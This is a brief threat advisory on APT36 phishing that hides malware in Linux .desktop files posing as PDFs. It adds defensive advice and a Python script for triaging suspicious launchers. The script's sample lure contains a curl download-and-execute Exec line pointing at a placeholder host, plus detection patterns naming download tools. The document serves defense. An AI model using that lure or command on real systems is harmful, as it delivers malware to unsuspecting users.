APT36 hackers abuse Linux .desktop files to install malware in new attacks

What’s new: APT36, a Pakistani cyber espionage group, is exploiting Linux .desktop files to deploy malware in attacks targeting Indian government and defense entities. The attacks, which began on August 1, 2025, involve phishing emails containing ZIP archives with malicious .desktop files disguised as PDFs. These files execute hidden commands to download and run malware, enabling data exfiltration and persistent access.
Who’s affected
Government and defense organizations in India are the primary targets of these attacks, which aim for data exfiltration and ongoing espionage.
What to do
- Educate users about the risks of opening unexpected email attachments, especially ZIP files.
- Implement security measures to monitor and block the execution of .desktop files from untrusted sources.
- Regularly update and patch Linux systems to mitigate vulnerabilities.
- Consider using endpoint detection and response (EDR) solutions that can identify and respond to unusual file behaviors.
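As an added defensive example (not code from the article or from any vendor it mentions), the following Python script parses a .desktop file and flags the traits of the lure described above: a document-like Name, and an Exec line that wraps an inline shell command, calls a download or decoding tool, or runs something from a temporary path. Both sample entries are constructed here with a placeholder URL; the heuristics are a starting point for triage, not a verdict.

```python
import re

# Constructed sample of a lure .desktop file of the kind described above
# (placeholder URL; not an indicator taken from the article).
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Exec=bash -c "curl -s http://example.invalid/p -o /tmp/.p && sh /tmp/.p"
"""

# Constructed sample of an ordinary launcher, for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Name=Text Editor
Exec=gedit %U
"""

DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget|base64|python3?)\b")
SHELL_WRAPPER = re.compile(r"\b(ba|da|z)?sh\s+-c\b")
DOC_SUFFIX = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def parse_desktop(text: str) -> dict[str, str]:
    """Return key/value pairs from the [Desktop Entry] group; other groups are ignored."""
    entries: dict[str, str] = {}
    in_group = False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries


def assess_desktop(text: str) -> list[str]:
    """Heuristic findings for one .desktop file; an empty list means nothing was flagged."""
    entry = parse_desktop(text)
    exec_cmd = entry.get("Exec", "")
    findings = []
    if DOC_SUFFIX.search(entry.get("Name", "")):
        findings.append("Name mimics a document file")
    if SHELL_WRAPPER.search(exec_cmd):
        findings.append("Exec wraps an inline shell script")
    if DOWNLOAD_TOOLS.search(exec_cmd):
        findings.append("Exec invokes a download or decoding tool")
    if "/tmp/" in exec_cmd or "/dev/shm/" in exec_cmd:
        findings.append("Exec runs something from a world-writable temp path")
    return findings
```

Run it over the contents of unpacked email attachments or over ~/.local/share/applications and ~/.config/autostart to surface launchers that deserve a closer look.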